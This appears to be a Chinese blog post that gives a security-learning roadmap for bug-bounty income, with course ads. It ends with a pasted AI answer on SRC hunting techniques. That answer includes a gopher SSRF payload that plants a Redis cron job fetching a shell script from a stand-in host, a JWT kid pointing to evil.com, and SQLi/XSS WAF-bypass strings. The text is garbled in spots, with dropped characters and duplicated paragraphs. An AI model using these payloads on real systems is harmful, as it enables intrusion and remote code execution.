挖漏洞经验分享,挖漏洞赚取生活费,7天收益近2200,分享详细方法,给大家看看赚钱的姿势,网安接私活真的很香!

前言
023年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。

理由很简单,目前来说,信息安全的圈子人少,985、211院校很多都才建立这个专业,加上信息安全法的存在,形成了小圈子的排他效应,大佬们的技术交流都是在小圈子内进行,很难说全部的985、211院校都能快速形成这种圈子效应,这些都需要时间,所以根本就不可能形成那种所谓的只看学历,除非是北京邮电那几个学校至于学习方向,不要去听那些营销号说的几天入门不需要学编程的,学好专业课尤其是编程非常重要‼✅

这直接就决定了你的成长天花板,你现在还大一,学完编程学漏洞原理,把所有漏洞自己写个小靶场,自己写个exp,多去复现漏洞,学着去跟踪漏洞形成原理

提供安全学习之前的具体路径,路径并不一定是最适合大家的,大家自主择优选择,如果你想杠我,你是对的😀:

在这里插入图片描述

🎈1.网络原理:基本的五层模型,基本的路由协议,交换机、路由器、防火墙它们是干嘛的以及基本的工作原理。

🎈2.操作系统:linux的操作命令,windows的操作命令,以及它们的服务搭建,域和云的搭建,以及概念

🎈3.编程语言:我现在非常看重编程语言,因为对于漏洞理解,以及平时的刷洞,目标爬取的脚本,懂不懂编程语言天壤之别。推荐学习PYTHON PHP JAVA 当然还有MYSQL和前端如果把它当作语言的话

🎈4.经典漏洞原理的学习:学习一些经典的工具,看一些攻击靶场的wp,尝试去玩一些攻击靶场,然后学着去追一些新的漏洞成型原理,尝试写一些POC然后就是学习信息收集,横向,提权,免杀,痕迹清理,代码审计就看自己的了,其实安全的教程网络中很多,安全的基础大同小异,但是我是真的认为网络基础和开发基础真的很重要,所以写了这么一篇,安全是一个需要积累的过程。

一、基础部分
基础部分需要学习以下内容:

1.计算机网络 :
重点学习OSI、TCP/IP模型,网络协议,网络设备工作原理等内容,其他内容快速通读

2.Linux系统及命令
由于目前市面上的Web服务器7成都是运行在Linux系统之上,如果要学习渗透Web系统,最起码还是要对linux系统非常熟悉,常见的操作命令需要学会

学习建议:学习常见的10%左右的命令适用于90%的工作场景,和office软件一样,掌握最常用的10%的功能,基本日常使用没什么问题,遇到不会的,再去找度娘;常见的linux命令也就50-60个,很多小白囫囵吞枣什么命令都学,发现记不住啊!!!!这个学习方法也是不对的

3.Web框架
熟悉web框架的内容,前端HTML,JS等脚本语言了解即可,后端PHP语言重点学习,切记不要按照开发的思路去学习语言,php最低要求会读懂代码即可,当然会写最好,但不是开发,但不是开发,但不是开发,重要的事情说三遍

4.数据库
需要学习SQL语法,利用常见的数据库MySQL学习对应的数据库语法,也是一样,SQL的一些些高级语法可以了解,如果没有时间完全不学也不影响后续学习,毕竟大家不是做数据库分析师,不需要学太深

二、Web安全
1.Web渗透
掌握OWASP排名靠前的10余种常见的Web漏洞的原理、利用、防御等知识点,然后配以一定的靶场练习即可

推荐靶场:常见的靶场都可以上github平台搜索,推荐以下靶场DVWA、bWAPP、upload-labs-master、SQL-lib-master、WebBug、pikachu等,有些是综合靶场,有些是专门针对某款漏洞的靶场

2.安全工具学习
Web渗透阶段还是需要掌握一些必要的工具

主要要掌握的工具和平台:burp、AWVS、Appscan、Nessus、sqlmap、nmap、shodan、fofa、代理工具ssrs、hydra、medusa、airspoof等,以上工具的练习完全可以利用上面的开源靶场去练习,足够了

练习差不多了,可以去SRC平台渗透真实的站点,看看是否有突破,如果涉及到需要绕过WAF的,需要针对绕WAF专门去学习,姿势也不是特别多,系统性学习学习,然后多总结经验,更上一层楼

3.自动化渗透
自动化渗透需要掌握一门语言,且需要熟练运用,可以是任何一门自己已经掌握得很熟悉得语言,都可以,如果没有一门掌握很好的,那我推荐学习python,最主要原因是学起来简单,模块也比较多,写一些脚本和工具非常方便

学习python不需要掌握很多不需要的模块,也不需要开发成千上万行的代码,仅利用它编写一些工具和脚本,少则10几行代码,多则1-200行代码,一般代码量相对开发人员已经少得不能再少了,例如一个精简得域名爬虫代码核心代码就1-20行而已

花几天时间学习一下python的语法,有代码基础得朋友,最快可能一天就可以学习完python的语法,因为语言都是相通的,但是学习语言最快的就是写代码,别无他法;接下来可以开始尝试写一些常见得工具,如爬虫、端口探测、数据包核心内容提取、内网活跃主机扫描等,此类代码网上一搜一大把;然后再写一些POC和EXP脚本,以靶场为练习即可;有的小伙伴可能又要问了,什么是POC和EXP,自己度娘去,养成动手的好习惯

4.代码审计
此处内容要求代码能力比较高,因此如果代码能力较弱,可以先跳过此部分的学习,不影响渗透道路上的学习和发展。

但是如果希望在Web渗透上需要走得再远一些,需要精通一门后台开发语言,推荐php,因为后台采用php开发的网站占据最大,当然你还精通python、asp、java等语言,那恭喜你,你已经具备很好的基础了

代码审计顾名思义,审计别人网站或者系统的源代码,通过审计源代码或者代码环境的方式去审计系统是否存在漏洞(属于白盒测试范畴)

那具体要怎么学习呢?学习的具体内容按照顺序列举如下:

掌握php一些危险函数和安全配置
熟悉代码审计的流程和方法
掌握1-2个代码审计工具,如seay等
掌握常见的功能审计法;(推荐审计一下AuditDemo,让你产生自信)
常见CMS框架审计(难度大)
CMS框架审计,可以去一些CMS官方网站,下载一些历史存在漏洞的版本去审计,框架的学习利用官方网站的使用手册即可,如ThinkPHP3.2版本是存在一些漏洞,可以尝试读懂代码;但是切记不要一上来就看代码,因为CMS框架的代码量比较大,如果不系统先学习框架,基本属于看不懂状态;学习框架后能够具备写简单的POC,按照代码审计方法结合工具一起审计框架;其实也没有想想中的那么难,如果你是开发人员转行的,恭喜你,你已经具备代码审计的先天性优势。

那有的朋友又问了,我代码很差,不学习代码审计行不行,代码审计不是学习网络安全的必要条件,能够掌握最好,掌握不了也不影响后续的学习和就业,但你需要选择一个阶段,练习得更专业精通一些,如web渗透或者内网渗透,再或者是自动化渗透

三、内网安全
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位

如果想就业面更宽一些,技术竞争更强一些,需要再学习内网渗透相关知识

内网的知识难度稍微偏大一些,这个和目前市面上的学习资料还有靶场有一定的关系;内网主要学习的内容主要有:内网信息收集、域渗透、代理和转发技术、应用和系统提权、工具学习、免杀技术、APT等等

四、渗透拓展
渗透拓展部分,和具体工作岗位联系也比较紧密,尽量要求掌握,主要有日志分析、安全加固、应急响应、等保测评等内容;其中重点掌握前三部分,这块的资料网络上也不多,也没有多少成型的书籍资料,可通过行业相关的技术群或者行业分享的资料去学习即可,能学到这一步,基本上已经算入门成功,学习日志分析、安全加固、应急响应三部分的知识也相对较为容易

但是有很多零基础的小白代码基础通常较弱,很多小白会倒在前期学习语言上,所以推荐先学习web渗透和工具,也比较有意思,容易保持一个高涨的学习动力和热情。像php语言、自动化渗透和代码审计部分内容,可以放在最后,当学习完毕前面知识后,也相当入门后,再来学习语言,相对会容易一些

四、零基础如何快速入门
如果你问我,小白应该如何有效的快速入门,我会毫不犹豫的告诉你“找个靠谱的入门课程带你入门”比起你看书或者自己一个人慢慢摸索,效率是高很多的!

下面这个课程是我比较推荐的,课程是完全面向零基础的朋友,老师讲的通俗易懂,就算是小白也能完全跟得上,而且每节课程都配备了相对应的靶场练习,这样就可以在实践中印证理论、加深理解、同时继续扩展学习,这对小白来说帮助非常大

接下来我将给各位同学划分一张学习计划表!

学习计划
那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:

阶段一:初级网络安全工程师
接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?

阶段二:中级or高级网络安全工程师(看自己能力)
综合薪资区间15k~30k

7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。

零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;

Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三:顶级网络安全工程师
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

img

学习资料分享
当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。

img

学习资料分享
当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。

<think>嗯,用户想了解SRC掘技巧,也就是安全响应中心漏洞掘的方法,而且需要深入一些,真正能帮助他们通过赚取赏金。首先,我得先确定用户的基础,可能他们已经了解一些基本概念,但需要更高级的技巧。然后,我要考虑哪些方面是SRC掘中的关键点,比如信息收集、漏洞类型的选择、工具使用、逻辑漏洞掘、绕过技巧、历史漏洞分析、权限提升、报告撰写等等。 用户可能已经知道常规的漏洞类型,比如SQL注入、XSS,但可能缺乏如何高效发现这些漏洞的策略。需要强调信息收集的重要性,因为全面的信息能增加攻击面。比如子域名枚举、目录扫描、JS文件分析、参数提取这些步骤,用户可能没有系统地应用过。 然后,漏洞类型方面,除了常见漏洞,可能需要介绍一些容易被忽视的漏洞,如SSRF、CSRF、业务逻辑漏洞,特别是业务逻辑漏洞在实战中往往更容易发现,但需要深入理解业务流程。比如支付漏洞中的金额篡改,用户可能没考虑到参数是否可以修改,或者是否有服务端校验。 工具链部分,用户可能使用过一些工具,但如何组合使用,或者使用更高效的工具,比如ParamSpider和x8工具进行参数提取,或者使用一些被动扫描工具如Arjun,这些可能是他们需要了解的。 逻辑漏洞的深入掘,比如并发竞争条件、条件竞争,用户可能没有测试过,或者不知道如何构造请求。比如批量请求绕过限频,或者时间差导致的漏洞。 绕过技巧方面,WAF的绕过是实际洞中常遇到的难题,用户可能需要具体的payload示例,比如SQL注入中如何绕过过滤,或者XSS中如何编码绕过。 历史漏洞的关联分析,用户可能没有意识到同一厂商不同子域或功能可能存在相同的问题,所以需要教他们如何利用之前的报告或CVE来寻找新模式。 权限提升和组合漏洞,比如信息泄露导致后续攻击,或者多个低危漏洞组合成高危,这也是提升漏洞价值的关键点。 报告撰写部分,用户可能知道漏洞的存在,但如何有效沟通,让厂商快速理解并确认漏洞,从而更快获得赏金,这也是需要注意的地方。 还要考虑用户可能的误区,比如只关注技术漏洞而忽视业务逻辑,或者测试时过于粗暴导致被封禁IP。需要提醒他们注意测试的合法性和范围,遵守SRC的规则。 最后,要确保内容结构清晰,分点列出,每个技巧都结合实际例子,让用户能够理解并应用。同时,强调耐心和积累的重要性,漏洞掘不是一蹴而就的,需要持续学习和实践。</think>好的,我将从实战角度深入介绍SRC(安全响应中心)漏洞掘的高阶技巧,这些方法在真实漏洞赏金猎人中广泛应用,结合技术细节和攻击面扩展思路,帮助提升漏洞发现效率。 --- ### **一、信息收集的降维打击** 1. **深度资产测绘** - 使用`chaos-zyter` + `Sublist3r`交叉验证子域名,结合证书透明度日志(如crt.sh)获取隐藏资产 - 通过`JSFinder`解析所有JavaScript文件,提取API端点、敏感路径(如/admin/config.json) - 利用`Waybackurls`获取历史URL存档,常发现已下线但未关闭的功能页面 2. **参数爆破的艺术** - 使用`ParamSpider`自动爬取参数后,通过`x8`工具集(x8、qsreplace)生成海量参数变异组合 - 重点关注`callback`、`redirect_uri`、`file`等高风险参数名,结合`ffuf`进行模糊测试 3. **源码泄露自动化** - 部署`git-all-secrets`扫描Github/Gitlab,设置关键词如: ```python "password" extension:env site:target.com ``` - 使用`DumpsterDiver`扫描备份文件(*.bak, *~),特别关注`/wp-content/uploads/`等CMS目录 --- ### **二、漏洞掘的精准打击点** #### **1. SSRF进阶利用链** - 探测云元数据API(AWS/Aliyun/腾讯云)时,尝试通过`X-Forwarded-For`头绕过IP限制 - 结合`gopher://`协议攻击Redis未授权访问,构造payload注入定时任务 ```http GET /proxy?url=gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$61%0d%0a%0a%0a%0a*/1 * * * * root curl http://your-server.com/shell.sh ``` #### **2. 业务逻辑漏洞** - **支付漏洞**:篡改商品数量为负数,观察是否产生"余额增加"(如`quantity=-1`) - **验证码绕过**:连续发送10次相同请求,观察是否触发逻辑锁绕过 - **接口时序攻击**:在手机号修改流程中,并行请求新旧手机号的验证码接口 #### **3. JWT攻击矩阵** - 爆破弱密钥(常见密钥如`secret123`、`changeme`) - 注入`kid`参数指向可控服务器(如`kid=http://evil.com/key.pem`) --- ### **三、绕过技巧的黑暗艺术** #### **WAF绕过模板** ```sql /* SQLi绕过 */ id=1+union+/*%0a*/select+1,version()-- - /* XSS绕过 */ <svg/onload=alert`1`> <img src=x onerror="alert(1)"> /* SSTI绕过(Twig引擎) */ {{7*'7'}} → 若返回49则存在漏洞 ``` #### **云环境绕过** - 在`Host`头后追加随机子域名混淆检测: ```http Host: target.com.evil.com ``` --- ### **四、漏洞组合的致命连击** 1. **信息泄露 → RCE** - 通过`.git`泄露获取数据库配置 → 解密后登录phpMyAdmin → 执行SQL语句写入Webshell 2. **CSRF + 权限提升** - 诱使管理员点击恶意页面,通过CSRF修改其账号为超级管理员角色 3. **OAuth劫持链** - 利用开放重定向漏洞构造恶意回调地址 → 窃取OAuth授权码 → 接管第三方账号 --- ### **五、漏洞报告提权技巧** 1. **漏洞验证视频**:使用`asciinema`录制终端操作过程,比截图更具说服力 2. **风险量化模板**: ``` [Impact] 攻击者可利用此漏洞在30秒内接管任意用户账号 [Reproduction Steps] 1. 登录普通账号 2. 修改Cookie中userID=admin 3. 刷新页面获得管理员权限 [Suggested Fix] 增加服务端会话验证机制 ``` 3. **漏洞关联建议**:在报告末尾注明:"该漏洞可能影响同一架构下的xx子系统" --- ### **六、持续学习的核心资源** 1. **漏洞模式库**: - HackerOne公开报告库(https://hackerone.com/hacktivity) - CVE Details(https://www.cvedetails.com/)按产品分类检索 2. **自动化工具链**: - Nuclei自定义POC模板(https://nuclei.projectdiscovery.io/) - 自建被动扫描系统:Burp Suite + Logger++ + Elasticsearch --- **关键心法**: - 每至少分析3个高质量漏洞报告,建立"漏洞模式识别"直觉 - 对每个参数保持"如果我是开发者,这里可能犯什么错误"的思维习惯 - 使用`Obsidian`建立个人漏洞知识库,记录每次测试的路径和Payload 通过这套方法论,配合持续实战,可显著提升漏洞掘成功率。注意始终遵守SRC测试规则,避免触碰法律红线。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值